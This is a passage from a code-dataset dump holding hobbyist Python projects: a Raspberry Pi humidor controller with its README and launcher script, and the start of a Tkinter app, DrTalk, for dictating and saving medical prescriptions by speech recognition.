%H:%M:%S'))\n\t\thumidity, temp = Adafruit_DHT.read(DHT_TYPE, DHT_PIN)\n\n\t\tprint('making sure there were readings')\n\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\twhile humidity is None or temp is None:\n\t\t\tif statusControl != 3:\n\t\t\t\tstreamer.log(\"Status\", \"No Reading\")\n\t\t\t\tstatusControl = 3\n\t\t\tprint('failed to get readings')\n\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\ttime.sleep(5)\n\t\t\thumidity, temp = Adafruit_DHT.read(DHT_TYPE, DHT_PIN)\n\t\tprint('got readings')\n\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\ttemp = round(temp * 1.8 + 32)\n\t\thumidity = round(humidity)\n\t\tif staleHumidity is None:\n\t\t\tif int(humidity) < int(controlHumidity):\n\t\t\t\tstaleHumidity = int(humidity) + 1\n\t\t\telif int(humidity) > int(controlHumidity):\n\t\t\t\tstaleHumidity = int(humidity) - 1\n\t\t\telse:\n\t\t\t\tstaleHumidity = humidity\n\t\tprint('Temperature: {0:0.1f} F'.format(temp))\n\t\tprint('Humidity: {0:0.1f} %'.format(humidity))\n\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\ttime.sleep(2)\n\t\tif humidity == staleHumidity:\n\t\t\tprint('Humidity No Change - Skipping ISS Update')\n\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\ttime.sleep(2)\n\t\telse:\n\t\t\tprint('Change in Humidity')\n\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\tstaleHumidity = humidity\n\t\t\tstaleTemp = temp\n\t\t\tprint('Sending to ISS')\n\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\tstreamer.log(\"Humidity\", int(humidity))\n\t\t\tstreamer.log(\"Temperature\", int(temp))\n\t\t\ttime.sleep(10)\n\t\t\tprint('Testing humidity')\n\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\tif int(humidity) < int(controlHumidity):\n\t\t\t\tprint('Humidity less than control')\n\t\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\t\tsubprocess.call(\"ykushcmd -u 1\", shell=True)\n\t\t\t\tprint('Turning on Fan')\n\t\t\t\tsubprocess.call(\"ykushcmd -u 2\", shell=True)\n\t\t\t\tprint('Turning on Humidifier')\n\t\t\t\tif statusControl != 3:\n\t\t\t\t\tstatusControl = 3\n\t\t\t\t\tstreamer.log(\"Status\", \"Increasing Humidity\")\n\t\t\t\t\tstreamer.log(\"Fan\", \"ON\")\n\t\t\t\t\tstreamer.log(\"Humidifier\", \"ON\")\n\t\t\t\tprint('Testing complete')\n\t\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\telif int(humidity) > int(controlHumidity):\n\t\t\t\tprint('Humidity above control')\n\t\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\t\tsubprocess.call(\"ykushcmd -u 1\", shell=True)\n\t\t\t\tprint('Turning on Fan')\n\t\t\t\tsubprocess.call(\"ykushcmd -d 2\", shell=True)\n\t\t\t\tprint('Turning off Humidifier')\n\t\t\t\tif statusControl != 4:\n\t\t\t\t\tstatusControl = 4\n\t\t\t\t\tstreamer.log(\"Status\", \"Circulating Air\")\n\t streamer.log(\"Fan\", \"ON\")\n\t streamer.log(\"Humidifier\", \"OFF\")\n\t\t\t\tprint('Testing complete')\n\t\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\telse:\n\t\t\t\tprint('Humidity at control')\n\t\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\t\t\tsubprocess.call(\"ykushcmd -d 1\", shell=True)\n\t\t\t\tprint('Turning off Fan')\n\t\t\t\tsubprocess.call(\"ykushcmd -d 2\", shell=True)\n\t\t\t\tprint('Turning off Humidifier')\n\t\t\t\tif statusControl != 5:\n\t\t\t\t\tstatusControl = 5\n\t\t\t\t\tstreamer.log(\"Status\", \"Idle\")\n\t\t\t\t\tstreamer.log(\"Fan\", \"OFF\")\n\t\t\t\t\tstreamer.log(\"Humidifier\", \"OFF\")\n\t\t\t\tprint('Testing complete')\n\t\t\t\tprint(time.strftime('%a %H:%M:%S'))\n\t\tstreamer.flush()\n\t\tstreamer.log(\"My Messages\", \"Last Updated\")\n\t\tif statusControl == 3:\n\t\t\ttime.sleep(int(round(FREQUENCY_SECONDS / 2)))\n\t\telif statusControl == 4:\n\t\t\ttime.sleep(FREQUENCY_SECONDS)\n\t\telse:\n\t\t\ttime.sleep(int(round(FREQUENCY_SECONDS * 2)))\nexcept KeyboardInterrupt:\n\tprint \"Shutdown requested...exiting\"\n\tstreamer.log(\"My Messages\", \"Pi Shutting Down\")\n\tstreamer.log(\"Status\", \"Going Down\")\n\tstreamer.close()\nexcept Exception:\n\ttraceback.print_exc(file=sys.stdout)\nsys.exit(0)\n"
},
{
"alpha_fraction": 0.7956015467643738,
"alphanum_fraction": 0.8059508204460144,
"avg_line_length": 153.60000610351562,
"blob_id": "1b7794df0f7641da26e8f3f77354ec31b053b4d1",
"content_id": "77434d23dc1aa06490b051e81333f86aa5baaa5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 773,
"license_type": "no_license",
"max_line_length": 293,
"num_lines": 5,
"path": "/README.md",
"repo_name": "BrightlyTechnologies/HumidorPi",
"src_encoding": "UTF-8",
"text": "# HumidorPi\nThis is a DIY project to modify a cigar humidor and enable it to be \"self monitoring\" by using the following hardware: Raspberry Pi, Adafruit Sensor AM2302, Yepkit USB Smart Hub, Centrifugal Fan, and Ultrasonic Humidifier.<br>\nWith this the Raspberry Pi will receive real humidity readings from the AM2302 sensor, and based on set thresholds will send control commands via command line to the Yepkit USB Smart Hub (or YKUSH for short) to enable/disable power to the connected Centrifugal Fan & Ultrasonic Humidifier.<br>\nAll the while the Raspberry Pi will be reporting back to Initial State to allow for abroad status readings & history tracking.<br>\nThe control program will be written in Python and utilize shell commands in order to control the YKUSH unit.\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.760869562625885,
"avg_line_length": 22,
"blob_id": "dff4fd819a7b813d45d4ff486e9585a3deaea9a4",
"content_id": "bdcf72a944624229902e9ab079c5900440a1682d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 8,
"path": "/launcher.sh",
"repo_name": "BrightlyTechnologies/HumidorPi",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n#This is a simple launcher script that can be added to crontab to kick off the HumidorPi script on startup\n\ncd /\ncd home/pi/HumidorPi/\nsleep 30\nsudo python humidorpi.py\ncd /\n"
}
] | 4 |
sky-ridz/Python | https://github.com/sky-ridz/Python | e757f9ccb4540dfa4a92a1edc5c5386b35c404bc | 3e44c51113b2742e797bdf568ba9e9897d91e768 | 1bd63d29f0f519c9824f04a3f4d2fe9435b34bab | refs/heads/master | 2020-07-23T19:29:47.255259 | 2016-08-29T12:09:41 | 2016-08-29T12:09:41 | 66,840,133 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6201550364494324,
"alphanum_fraction": 0.6511628031730652,
"avg_line_length": 23.799999237060547,
"blob_id": "7c9be4af03da3a70e8b3909cc8788c7c794cc9c8",
"content_id": "f44e2a089e3053a502aa34adffd457e551d64b94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 5,
"path": "/celsius to farenheit2.py",
"repo_name": "sky-ridz/Python",
"src_encoding": "UTF-8",
"text": "x= input(\"write the temp in celsius:\")\r\nc=int(x)\r\nf=9/5*c+32\r\nprint(\"the temp in farenheit is:\",f)\r\ninput(\"press enter to end\")\r\n"
}
] | 1 |
RitikPatle/DrTalk-Minor2-Windows- | https://github.com/RitikPatle/DrTalk-Minor2-Windows- | e46e2bdb34ed00d613a8c1b87a3d7bbf130fb773 | f9b0b1a6108436f4a941ccd27d57c7829efd7382 | 784e60dc0e20997a3cad3499632b644c4613dd44 | refs/heads/master | 2023-05-09T18:23:27.182751 | 2021-05-12T09:40:33 | 2021-05-12T09:40:33 | 366,663,883 | 2 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5761580467224121,
"alphanum_fraction": 0.6223418712615967,
"avg_line_length": 37.07322311401367,
"blob_id": "efc059821b3f7c7945b5bd6e2f181fe6957b1d71",
"content_id": "a67d3e954b86bbb57f76aa88530935ab34e05f70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 36398,
"license_type": "no_license",
"max_line_length": 340,
"num_lines": 956,
"path": "/drtalk.py",
"repo_name": "RitikPatle/DrTalk-Minor2-Windows-",
"src_encoding": "UTF-8",
"text": "from tkinter import *\nimport sqlite3\nimport pyttsx3\nimport speech_recognition as sr\nimport os,sys\nfrom docx import Document\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\nfrom docx.shared import Cm , RGBColor , Inches\nfrom docx.shared import Pt \nimport datetime\nimport re\nfrom tkinter import messagebox\n\nwindow = Tk()\nwindow.title('DrTalk')\nwindow.wm_state('zoomed') #to open window in maximize mode\nwindow.resizable(0,0) #to disable the Restore Down button\nwindow.configure(background='#ffffff') #to provide a background\n\niconvar = PhotoImage(file='icon.gif') #to give icon\nwindow.iconphoto(True,iconvar) #to give icon\n\nlogovar = PhotoImage(file='logo.gif') #to use logo\nlogo = Label(window,image=logovar) #to use logo\nlogo.place(x=-2,y=0) #to use logo\n\ndef SpeakText(sentence):\n engine = pyttsx3.init()\n engine.say(sentence)\n engine.runAndWait()\n\ndef ListenText():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print('I am listening')\n r.adjust_for_ambient_noise(source,duration=1)\n audio = r.listen(source)\n try:\n lisningvar = r.recognize_google(audio)\n except sr.UnknownValueError:\n lisningvar = ''\n return lisningvar\n\ndef cnvp(NaMe,GeNder,DoBi,PhNu,eID,REGnO,ExPerI,ClNc,DGre,UsRnme,PaSSwD,AoNE,AtWO,AtRE):\n pname = StringVar()\n pgendr = StringVar()\n page = StringVar()\n sympt = StringVar()\n diag = StringVar()\n pres = StringVar()\n adv = StringVar()\n \n def storeprescrip():\n prescripdoc = Document()\n\n RESC=prescripdoc.add_paragraph(\"\")\n RESC.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n cLNC=RESC.add_run(f\"\"\"{ClNc}\\n\"\"\")\n cLNC.font.size=Pt(20)\n cLNC.font.color.rgb=RGBColor(0,111,80)\n\n pNAM=RESC.add_run(\"\"\"Patient's Name: \"\"\")\n pNAM.font.size=Pt(16)\n #pNAM.font.color.rgb=RGBColor(0,0,0)\n\n pNAME=RESC.add_run(f\"\"\"{pname.get()}\\n\"\"\")\n pNAME.font.size=Pt(16)\n pNAME.font.color.rgb=RGBColor(0,111,80)\n\n pGEN=RESC.add_run(\"\"\"Gender: \"\"\")\n pGEN.font.size=Pt(16)\n #pGEN.font.color.rgb=RGBColor(0,0,0)\n\n pGEND=RESC.add_run(f\"\"\"{pgendr.get()}\\t\\t\"\"\")\n pGEND.font.size=Pt(16)\n pGEND.font.color.rgb=RGBColor(0,111,80)\n\n pAG=RESC.add_run(\"\"\"Age: \"\"\")\n pAG.font.size=Pt(16)\n #pAG.font.color.rgb=RGBColor(0,0,0)\n\n pAGE=RESC.add_run(f\"\"\"{page.get()}\"\"\")\n pAGE.font.size=Pt(16)\n pAGE.font.color.rgb=RGBColor(0,111,80)\n\n pRESC=prescripdoc.add_paragraph(\"\")\n pRESC.alignment = WD_ALIGN_PARAGRAPH.LEFT\n\n sYMPH=pRESC.add_run(\"\"\"Symptoms:\\n\"\"\")\n sYMPH.font.size=Pt(16)\n #sYMPH.font.color.rgb=RGBColor(0,0,0)\n\n sYMPT=pRESC.add_run(f\"\"\"{SymptomS.get(\"1.0\",'end-1c')}\\n\"\"\")\n sYMPT.font.size=Pt(14)\n sYMPT.font.color.rgb=RGBColor(0,111,80)\n\n dIAGH=pRESC.add_run(\"\"\"Diagnosis:\\n\"\"\")\n dIAGH.font.size=Pt(16)\n #dIAGH.font.color.rgb=RGBColor(0,0,0)\n\n dIAGT=pRESC.add_run(f\"\"\"{DiagnosiS.get(\"1.0\",'end-1c')}\\n\"\"\")\n dIAGT.font.size=Pt(14)\n dIAGT.font.color.rgb=RGBColor(0,111,80)\n\n pRESH=pRESC.add_run(\"\"\"Prescription:\\n\"\"\")\n pRESH.font.size=Pt(16)\n #pRESH.font.color.rgb=RGBColor(0,0,0)\n\n pREST=pRESC.add_run(f\"\"\"{PrescriptioN.get(\"1.0\",'end-1c')}\\n\"\"\")\n pREST.font.size=Pt(14)\n pREST.font.color.rgb=RGBColor(0,111,80)\n\n aDVCH=pRESC.add_run(\"\"\"Advice:\\n\"\"\")\n aDVCH.font.size=Pt(16)\n #aDVCH.font.color.rgb=RGBColor(0,0,0)\n\n aDVCT=pRESC.add_run(f\"\"\"{AdvicE.get(\"1.0\",'end-1c')}\\n\"\"\")\n aDVCT.font.size=Pt(14)\n aDVCT.font.color.rgb=RGBColor(0,111,80)\n\n pLABEL=pRESC.add_run(\"\"\"Prescribed by,\\n\"\"\")\n pLABEL.font.size=Pt(16)\n #pLABEL.font.color.rgb=RGBColor(0,0,0)\n\n dNAME=pRESC.add_run(f\"\"\"{NaMe}\\n\"\"\")\n dNAME.font.size=Pt(16)\n dNAME.font.color.rgb=RGBColor(0,111,80)\n\n dRGN=pRESC.add_run(\"\"\"Registration No.: \"\"\")\n dRGN.font.size=Pt(14)\n #dRGN.font.color.rgb=RGBColor(0,0,0)\n\n dRGNO=pRESC.add_run(f\"\"\"{REGnO}\\n\"\"\")\n dRGNO.font.size=Pt(14)\n dRGNO.font.color.rgb=RGBColor(0,111,80)\n\n dDGRE=pRESC.add_run(f\"\"\"{DGre}\\n\"\"\")\n dDGRE.font.size=Pt(14)\n dDGRE.font.color.rgb=RGBColor(0,111,80)\n\n dEX=pRESC.add_run(\"\"\"Experience: \"\"\")\n dEX.font.size=Pt(14)\n #dEX.font.color.rgb=RGBColor(0,0,0)\n\n dEXP=pRESC.add_run(f\"\"\"{ExPerI}y\\t\"\"\")\n dEXP.font.size=Pt(14)\n dEXP.font.color.rgb=RGBColor(0,111,80)\n\n dPH=pRESC.add_run(\"\"\"Phone No.: \"\"\")\n dPH.font.size=Pt(14)\n #dPH.font.color.rgb=RGBColor(0,0,0)\n\n dPHN=pRESC.add_run(f\"\"\"{PhNu}\\n\"\"\")\n dPHN.font.size=Pt(14)\n dPHN.font.color.rgb=RGBColor(0,111,80)\n\n dEI=pRESC.add_run(\"\"\"Email Id: \"\"\")\n dEI.font.size=Pt(14)\n #dEI.font.color.rgb=RGBColor(0,0,0)\n\n dEID=pRESC.add_run(f\"\"\"{eID}\\n\"\"\")\n dEID.font.size=Pt(14)\n dEID.font.color.rgb=RGBColor(00,111,80)\n\n dAT=pRESC.add_run(\"\"\"On Date: \"\"\")\n dAT.font.size=Pt(14)\n #dAT.font.color.rgb=RGBColor(0,0,0)\n\n dATE=pRESC.add_run(f\"\"\"{datetime.datetime.now().strftime('%d/%b/%Y')}\\t\"\"\")\n dATE.font.size=Pt(14)\n dATE.font.color.rgb=RGBColor(00,111,80)\n\n tIM=pRESC.add_run(\"\"\"At Time: \"\"\")\n tIM.font.size=Pt(14)\n #tIM.font.color.rgb=RGBColor(0,0,0)\n\n tIME=pRESC.add_run(f\"\"\"{datetime.datetime.now().strftime('%I:%M:%S %p')}\"\"\")\n tIME.font.size=Pt(14)\n tIME.font.color.rgb=RGBColor(00,111,80)\n\n currentdtinfo = datetime.datetime.now()\n docdtinfo = currentdtinfo.strftime('%Y%b%d%H%M%S')\n prscdocnme = f'{docdtinfo}{pname.get()}'\n prescripdoc.save(f'Prescriptions\\{prscdocnme}.docx')\n \n pdb = sqlite3.connect('drtalk')\n pcr = pdb.cursor()\n pcr.execute(\"\"\"create table if not exists ps(Name VARCHAR,Gender VARCHAR,Age VARCHAR,Symptoms VARCHAR,Diagnosis VARCHAR,Prescription VARCHAR,Advice VARCHAR,DrregNO VARCHAR,Prscrpnme VARCHAR)\"\"\")\n pcr.execute(\"\"\"insert into ps VALUES(?,?,?,?,?,?,?,?,?)\"\"\",(pname.get(), pgendr.get(), page.get(), SymptomS.get(\"1.0\",'end-1c'), DiagnosiS.get(\"1.0\",'end-1c'), PrescriptioN.get(\"1.0\",'end-1c'), AdvicE.get(\"1.0\",'end-1c'),REGnO,prscdocnme))\n pdb.commit()\n pdb.close()\n VpLisnwndw.destroy()\n \n def lISten():\n SpeakText('Name')\n sname = ListenText()\n pName.insert(0,sname)\n\n SpeakText('Gender')\n srgndr = ListenText()\n pGender.insert(0,srgndr)\n\n SpeakText('Age')\n srage = ListenText()\n pAge.insert(0,srage)\n\n SpeakText('Symptoms')\n srsympt = ListenText()\n SymptomS.insert(0.0,srsympt)\n\n SpeakText('Diagnosis')\n srdiag = ListenText()\n DiagnosiS.insert(0.0,srdiag)\n\n SpeakText('Prescription')\n srpresc = ListenText()\n PrescriptioN.insert(0.0,srpresc)\n\n SpeakText('Advice')\n sradv = ListenText()\n AdvicE.insert(0.0,sradv)\n\n VpLisnwndw = Toplevel(bg='#ffffff')\n VpLisnwndw.wm_state('zoomed')\n VpLisnwndw.resizable(0,0)\n\n pInfO = LabelFrame(VpLisnwndw,text='Patient Information:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=125,width=1535)\n pInfO.place(x=0,y=5)\n\n pNamE = Label(pInfO,background='white',text='Name:',font='-size 18')\n pNamE.place(x=5,y=5)\n\n pName = Entry(pInfO,background='#ffffff',textvariable=pname,font='-size 17',width=110)\n pName.place(x=85,y=7)\n\n pGendeR = Label(pInfO,background='white',text='Gender:',font='-size 18')\n pGendeR.place(x=5,y=45)\n\n pGender = Entry(pInfO,background='#ffffff',textvariable=pgendr,font='-size 17',width=10)\n pGender.place(x=105,y=47)\n\n pAgE = Label(pInfO,background='white',text='Age:',font='-size 18')\n pAgE.place(x=265,y=45)\n\n pAge = Entry(pInfO,background='#ffffff',textvariable=page,font='-size 17',width=3)\n pAge.place(x=325,y=47)\n\n SymPtomS = Label(VpLisnwndw,background='white',text='Symptoms:',font='-size 18')\n SymPtomS.place(x=5,y=135)\n\n SymptomS = Text(VpLisnwndw,font='-size 17',bg='#ffffff',height=5,width=117)\n SymptomS.place(x=5,y=170)\n\n DiaGnosiS = Label(VpLisnwndw,background='white',text='Diagnosis:',font='-size 18')\n DiaGnosiS.place(x=5,y=305)\n \n DiagnosiS = Text(VpLisnwndw,font='-size 17',bg='#ffffff',height=5,width=117)\n DiagnosiS.place(x=5,y=338)\n\n PreScriptioN = Label(VpLisnwndw,background='white',text='Prescription:',font='-size 18')\n PreScriptioN.place(x=5,y=470)\n\n PrescriptioN = Text(VpLisnwndw,font='-size 17',bg='#ffffff',height=5,width=117)\n PrescriptioN.place(x=5,y=500)\n\n AdVicE = Label(VpLisnwndw,background='white',text='Advice:',font='-size 18')\n AdVicE.place(x=5,y=634)\n\n AdvicE = Text(VpLisnwndw,font='-size 17',bg='#ffffff',height=5,width=117)\n AdvicE.place(x=5,y=662)\n\n SaVeButton = Button(VpLisnwndw,text='Save',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 15',height=0,width=8,command=storeprescrip)\n SaVeButton.place(x=5,y=800)\n\n checkgoogle = os.system('ping -n 1 www.google.com | FIND \"Reply\"')\n if checkgoogle==0:\n VpLisnwndw.after(2000,lISten)\n\ndef ChangE(cNme,cGdr,cDob,cPhn,cEid,cReg,cExp,cCln,cDgr,cUsr,cPas,cAon,cAtw,cAth):\n fname = StringVar()\n gendr = StringVar()\n dob = StringVar()\n phoneno = StringVar()\n eid = StringVar()\n regno = StringVar()\n exp = StringVar()\n cln = StringVar()\n dgr = StringVar()\n uname = StringVar()\n passwd = StringVar()\n aone = StringVar()\n atwo = StringVar()\n athr = StringVar()\n\n docdb = sqlite3.connect('drtalk')\n drcr = docdb.cursor()\n drcr.execute(\"\"\"select * from drs where Uname=?\"\"\",[cUsr])\n res=drcr.fetchall()\n docdb.commit()\n docdb.close()\n for row in res:\n NAME=row[0]\n GEND=row[1]\n DOB=row[2]\n PHNO=row[3]\n EID=row[4]\n REGN=row[5]\n EXP=row[6]\n CLN=row[7]\n DGR=row[8]\n UNME=row[9]\n PASS=row[10]\n AONE=row[11]\n ATWO=row[12]\n ATHR=row[13]\n\n def changerec():\n nmatch=0\n gmatch=0\n dobmatch=0\n phnomatch=0\n eidmatch=0\n regnomatch=0\n expmatch=0\n dgrmatch=0\n passwdmatch=0\n aonematch=0\n atwomatch=0\n athrmatch=0\n NamePattern=r'[a-zA-Z]|\\.'\n if re.match(NamePattern,fname.get()):\n nmatch=1\n else:\n nmatch=0\n GenderPattern=r'Male|Female|Others'\n if re.match(GenderPattern,gendr.get()):\n gmatch=1\n else:\n gmatch=0\n DobPattern=r'\\d{2}/\\d{2}/\\d{4}'\n if re.match(DobPattern,dob.get()):\n dobmatch=1\n else:\n dobmatch=0\n PhnoPattern=r'\\d{10}'\n if re.match(PhnoPattern,phoneno.get()):\n phnomatch=1\n else:\n phnomatch=0\n EidPattern=r'[a-zA-Z0-9.]*@[a-zA-Z]*\\.com'\n if re.match(EidPattern,eid.get()):\n eidmatch=1\n else:\n eidmatch=0\n RegnoPattern=r'\\d{6}'\n if re.match(RegnoPattern,regno.get()):\n regnomatch=1\n else:\n regnomatch=0\n ExpPattern=r'\\d{2}'\n if re.match(ExpPattern,exp.get()):\n expmatch=1\n else:\n expmatch=0\n DgrPattern=r'[a-zA-Z0-9. -]'\n if re.match(DgrPattern,dgr.get()):\n dgrmatch=1\n else:\n dgrmatch=0\n PasswdPattern=r'(?=.*\\d)(?=.*[a-z])(?=.*[A-Z])(?=.*\\W)'\n if re.match(PasswdPattern,passwd.get()):\n passwdmatch=1\n else:\n passwdmatch=0\n AnsPattern=r'[A-Z]+'\n if re.match(AnsPattern,aone.get()):\n aonematch=1\n else:\n aonematch=0\n if re.match(AnsPattern,atwo.get()):\n atwomatch=1\n else:\n atwomatch=0\n if re.match(AnsPattern,athr.get()):\n athrmatch=1\n else:\n athrmatch=0\n if nmatch and gmatch and dobmatch and phnomatch and eidmatch and regnomatch and expmatch and dgrmatch and passwdmatch and aonematch and atwomatch and athrmatch==1:\n print('Matched')\n docdb = sqlite3.connect('drtalk')\n drcr = docdb.cursor()\n drcr.execute(\"\"\"UPDATE drs SET Name=?,Gender=?,Dob=?,PhoneNo=?,Eid=?,RegNo=?,Exp=?,Cln=?,Dgr=?,Uname=?,Passwd=?,Aone=?,Atwo=?,Athr=? where Uname=?\"\"\",[fname.get(), gendr.get(), dob.get(), phoneno.get(), eid.get(), regno.get(), exp.get(), cln.get(), dgr.get(), uname.get(), passwd.get(), aone.get(), atwo.get(), athr.get(),cUsr])\n docdb.commit()\n docdb.close()\n window.destroy()\n else:\n print('Not Matched')\n messagebox.showinfo(\"Wrong Entries\", \"Please Enter Informations in correct format\")\n\n def gOback():\n loggedin(cNme,cGdr,cDob,cPhn,cEid,cReg,cExp,cCln,cDgr,cUsr,cPas,cAon,cAtw,cAth)\n \n changeframe = Frame(window,bg='#ffffff',height=649,width=1536,background='#ffffff')\n changeframe.place(x=0,y=191)\n \n personalinfo = LabelFrame(changeframe,text='Personal Information:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=130,width=1535)\n personalinfo.place(x=0,y=5)\n\n nam = Label(personalinfo,text='Fullname:',bg='#ffffff',font='-size 18')\n nam.place(x=5,y=5)\n nme = Entry(personalinfo,bg='#ffffff',textvariable=fname,font='-size 17',width=107)\n nme.place(x=119,y=7)\n nme.insert(0,NAME)\n\n gndr = Label(personalinfo,text='Gender:',bg='#ffffff',font='-size 18')\n gendrbtn1 = Radiobutton(personalinfo,text='Male',tristatevalue='x',bg='#ffffff',variable=gendr,value='Male',font='-size 16')\n gendrbtn2 = Radiobutton(personalinfo,text='Female',tristatevalue='x',bg='#ffffff',variable=gendr,value='Female',font='-size 16')\n gendrbtn3 = Radiobutton(personalinfo,text='Others',tristatevalue='x',bg='#ffffff',variable=gendr,value='Others',font='-size 16')\n gndr.place(x=5,y=45)\n gendrbtn1.place(x=100,y=44)\n gendrbtn2.place(x=180,y=44)\n gendrbtn3.place(x=286,y=44)\n if GEND=='Male':\n gendrbtn1.select()\n elif GEND=='Female':\n gendrbtn2.select()\n elif GEND=='Others':\n gendrbtn3.select()\n else:\n print('Wrong value')\n\n DoB = Label(personalinfo,text='D.O.B (dd/mm/yyyy):',bg='#ffffff',font='-size 18')\n DoB.place(x=395,y=45)\n Dob = Entry(personalinfo,bg='#ffffff',textvariable=dob,font='-size 17',width=9)\n Dob.place(x=628,y=47)\n Dob.insert(0,DOB)\n\n Phn = Label(personalinfo,text='Contact Number:',bg='#ffffff',font='-size 18')\n Phn.place(x=760,y=45)\n Phno = Entry(personalinfo,bg='#ffffff',textvariable=phoneno,font='-size 17',width=10)\n Phno.place(x=950,y=47)\n Phno.insert(0,PHNO)\n\n Eml = Label(personalinfo,text='Email Id:',bg='#ffffff',font='-size 18')\n Eml.place(x=1110,y=45)\n Email = Entry(personalinfo,bg='#ffffff',textvariable=eid,font='-size 17',width=23)\n Email.place(x=1210,y=47)\n Email.insert(0,EID)\n\n professionalinfo = LabelFrame(changeframe,text='Professional Information:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=130,width=1535)\n professionalinfo.place(x=0,y=140)\n\n Regno = Label(professionalinfo,text='Registeration Number:',bg='#ffffff',font='-size 18')\n Regno.place(x=0,y=5)\n RegNo = Entry(professionalinfo,bg='#ffffff',textvariable=regno,font='-size 17',width=6)\n RegNo.place(x=250,y=7)\n RegNo.insert(0,REGN)\n\n ExP = Label(professionalinfo,text='Experience (In Years):',bg='#ffffff',font='-size 18')\n ExP.place(x=350,y=5)\n Exp = Entry(professionalinfo,bg='#ffffff',textvariable=exp,font='-size 17',width=2)\n Exp.place(x=595,y=7)\n Exp.insert(0,EXP)\n\n ClN = Label(professionalinfo,text='Clinic Name:',bg='#ffffff',font='-size 18')\n ClN.place(x=644,y=5)\n Cln = Entry(professionalinfo,bg='#ffffff',textvariable=cln,font='-size 17',width=55)\n Cln.place(x=793,y=7)\n Cln.insert(0,CLN)\n\n DgR = Label(professionalinfo,text='Education Qualification:',bg='#ffffff',font='-size 18')\n DgR.place(x=0,y=45)\n Dgr = Entry(professionalinfo,bg='#ffffff',textvariable=dgr,font='-size 17',width=96)\n Dgr.place(x=260,y=47)\n Dgr.insert(0,DGR)\n\n UsrNme = Label(changeframe,text='Username:',font='-size 18 -weight bold',bg='#ffffff')\n UsrNme.place(x=4,y=270)\n usernam = Entry(changeframe,background='#ffffff',textvariable=uname,font='-size 17',width=48)\n usernam.place(x=130,y=274)\n usernam.insert(0,UNME)\n\n pas = Label(changeframe,background='white',text='Password:',font='-size 18 -weight bold')\n pas.place(x=760,y=270)\n psswd = Entry(changeframe,background='#ffffff',textvariable=passwd,font='-size 17',width=48)\n psswd.place(x=890,y=274)\n psswd.insert(0,PASS)\n\n tac = LabelFrame(changeframe,text='Terms and Condition:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=285,width=1535)\n tac.place(x=0,y=307)\n\n fpaes1 = Label(tac,text='By chance if you forgot your password then by clicking on forgot password, You have answer the below given questions and you can change',bg='#ffffff',font='-size 18')\n fpaes1.place(x=0,y=5)\n\n fpaes2 = Label(tac,text='your password. Another thing is the application will accept only those Email Ids which are based on .com servers so you must enter only tho-',bg='#ffffff',font='-size 18')\n fpaes2.place(x=0,y=45)\n\n fpaes3 = Label(tac,text='-se emails having .com at end. Your password must contain set of numbers, letters (both Capital and small) and special symbols.',bg='#ffffff',font='-size 18')\n fpaes3.place(x=0,y=85)\n\n Ques1 = Label(tac,background='white',text='Q1) What is your Nickname? (All words must be in capital letters)',font='-size 18')\n Ques1.place(x=0,y=125)\n\n Answ1 = Entry(tac,background='#ffffff',textvariable=aone,font='-size 17',width=61)\n Answ1.place(x=710,y=127)\n Answ1.insert(0,AONE)\n\n Ques2 = Label(tac,background='white',text='Q2) Which city you love the most? (All words must be in capital letters)',font='-size 18')\n Ques2.place(x=0,y=165)\n\n Answ2 = Entry(tac,background='#ffffff',textvariable=atwo,font='-size 17',width=57)\n Answ2.place(x=764,y=167)\n Answ2.insert(0,ATWO)\n\n Ques3 = Label(tac,background='white',text='Q3) What is the name of your first school? (All words must be in capital letters)',font='-size 18')\n Ques3.place(x=0,y=205)\n\n Answ3 = Entry(tac,background='#ffffff',textvariable=athr,font='-size 17',width=50)\n Answ3.place(x=855,y=207)\n Answ3.insert(0,ATHR)\n\n CanceL = Button(changeframe,text='Cancel',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=gOback)\n CanceL.place(x=5,y=596)\n\n ConFirm = Button(changeframe,text='confirm',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=changerec)\n ConFirm.place(x=1390,y=596)\n\ndef loggedin(N,G,Do,Ph,Ei,R,Ex,C,Dg,U,Pa,Ao,At,Ar):\n def cnvpcall():\n cnvp(N,G,Do,Ph,Ei,R,Ex,C,Dg,U,Pa,Ao,At,Ar)\n\n def LogOut():\n signinfn()\n\n def ChAngE():\n ChangE(N,G,Do,Ph,Ei,R,Ex,C,Dg,U,Pa,Ao,At,Ar)\n \n loggedinframe = Frame(window,bg='#ffffff',height=649,width=1536,background='#ffffff')\n loggedinframe.place(x=0,y=191)\n\n userinfo = LabelFrame(loggedinframe,text='User Information:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=165,width=1535)\n 